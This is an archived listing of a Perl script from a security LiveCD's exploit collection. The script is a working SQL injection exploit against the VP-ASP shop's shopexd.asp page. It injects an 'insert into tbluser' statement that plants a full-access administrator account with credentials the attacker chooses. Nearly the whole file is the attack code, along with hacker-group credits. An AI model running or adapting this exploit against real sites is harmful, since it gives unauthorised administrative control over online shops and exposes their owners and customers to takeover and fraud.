home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / vpasp / tio-fux.pl < prev    next >
Perl Script  |  2005-02-12  |  1KB  |  40 lines

  1. #!/usr/bin/perl -w
  2. $pamer = "
  3. 1ndonesian Security Team (1st)
  4. ==============================
  5. tio-fux.pl, vpasp SQL Injection Proof of Concept
  6. Exploit by  : Bosen & TioEuy
  7. Discover by : TioEuy, AresU
  8. Greetz to   : AresU, syzwz (ta for da ipod), TioEuy, sakitjiwa,
  9. muthafuka all #hackers\@centrin.net.id/austnet.org
  10. http://bosen.net/releases/
  11. "; # shut up ! we're the best in our country :)
  12.  
  13. use LWP::UserAgent;  # LWP Mode sorry im lazy :)
  14. use HTTP::Request;
  15. use HTTP::Response;
  16. $| = 1;
  17. print $pamer;
  18. if ($#ARGV<3){
  19.   print "\n Usage: perl tio-fux.pl <uri> <prod-id> <user> <password>
  20.   \n\n";
  21.     exit;
  22.     }
  23.     my $biji    =
  24.     "1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29";
  25.     $tio     = "$ARGV[0]/shopexd.asp?id=$ARGV[1]";
  26.     $tio    .= ";insert into tbluser
  27.     (\"fldusername\",\"fldpassword\",\"fldaccess\") ";
  28.     $tio    .= "values ('$ARGV[2]','$ARGV[3]','$biji')--";
  29.  
  30.     my $bosen  = LWP::UserAgent->new();
  31.     my $gembel = HTTP::Request->new(GET => $tio);
  32.     my $dodol  = $bosen->request($gembel);
  33.     if ($dodol->is_error()) {
  34.        printf " %s\n", $dodol->status_line;
  35.        } else {
  36.           print "Tuing !\n";
  37.       }
  38.       print "\n680165\n";
  39.  
  40.